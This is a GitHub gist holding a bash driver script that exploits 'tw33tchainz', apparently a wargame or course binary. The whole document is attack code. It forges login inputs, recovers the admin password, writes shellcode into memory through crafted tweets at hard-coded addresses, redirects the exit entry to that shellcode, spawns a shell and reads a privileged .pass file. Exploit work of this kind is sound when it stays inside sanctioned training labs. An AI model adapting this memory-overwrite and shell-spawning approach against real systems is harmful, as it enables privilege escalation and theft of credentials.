Skip to content

Instantly share code, notes, and snippets.

@Newbrict
Created March 19, 2015 00:55
Show Gist options
  • Save Newbrict/cc327dc28a455ae62f29 to your computer and use it in GitHub Desktop.
Save Newbrict/cc327dc28a455ae62f29 to your computer and use it in GitHub Desktop.
Bash driver to exploit tw33tchainz
input_file="inputs"
debug_file="debug"
# nuke that shit
rm $input_file
rm $debug_file
touch $input_file
touch $debug_file
binary="/levels/project1/tw33tchainz"
shellCode="/tmp/bleached/project1/binsh.hex"
# in bytes "" <- hand quotes
shellCodeSize=$(cat $shellCode | wc -w)
stepsSinceExit=999
# program state constants
programState=0
numTweets=0
WAIT=999
GET_PASS=1000
GET_ADMIN=1001
WRITE_SHELL=1002
WRITE_EXIT=1003
writeAddr="0x0804c0c1"
exitAddr="0x0804c038"
writeAddrValues=$(echo $writeAddr | perl -pe "s/..(..)(..)(..)(..)/\4 \3 \2 \1/")
input() {
printf "$1" "$2" >> $input_file
printf "$1" "$2" >> debug
}
tail -f $input_file | $binary | while read output
do
# filter the asni colors and clears
output="$(echo "$output" | sed "s,\x1B\[[0-9;]*[a-zA-Z],,g")"
echo "$output"
case "$programState" in
$GET_PASS)
genpass="$output"
password="$(python decode_pass.py $genpass)"
programState=$GET_ADMIN
;;
$GET_ADMIN)
if [ "$stepsSinceExit" == "1" ]
then
input "3\n"
input "%s\n" "$password"
programState=$WRITE_SHELL
fi
;;
$WRITE_SHELL)
# Since we're admin now it's 2 steps away
if [ "$stepsSinceExit" == "2" ]
then
input "1\n"
hexVal=$(cat $shellCode | cut -d' ' -f$(($numTweets+1)))
tweet=$(python get_tweet.py $writeAddr $numTweets $hexVal)
tsize=$(echo $tweet | wc -c)
input "%s\n" "$tweet"
numTweets=$(($numTweets+1))
if [ ! $numTweets -lt $shellCodeSize ]
then
programState=$WRITE_EXIT
numTweets=0
fi
fi
;;
$WRITE_EXIT)
if [ "$stepsSinceExit" == "2" ]
then
input "1\n"
hexVal=$(echo $writeAddrValues | cut -d' ' -f$(($numTweets+1)))
tweet=$(python get_tweet.py $exitAddr $numTweets $hexVal)
input "%s\n" "$tweet"
numTweets=$(($numTweets+1))
if [ ! $numTweets -lt 4 ]
then
programState=$EXIT
numTweets=0
fi
fi
;;
$EXIT)
if [ "$stepsSinceExit" == "2" ]
then
input "5\n"
# wait for the shell to fire up
sleep 1
input "cat /home/project1_priv/.pass\n"
programState=$WAIT
fi
;;
*)
#Do nothing
;;
esac
case "$output" in
"Enter Username:")
input "%s" "$(python -c "print '\x01'*15")"
;;
"Enter Salt:")
input "%s" "$(python -c "print '\xff'*15")"
;;
"Generated Password:")
programState=$GET_PASS
input "\n"
;;
"5: Exit"*)
stepsSinceExit=0
;;
*)
#Do nothing
;;
esac
stepsSinceExit=$(($stepsSinceExit + 1))
done
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment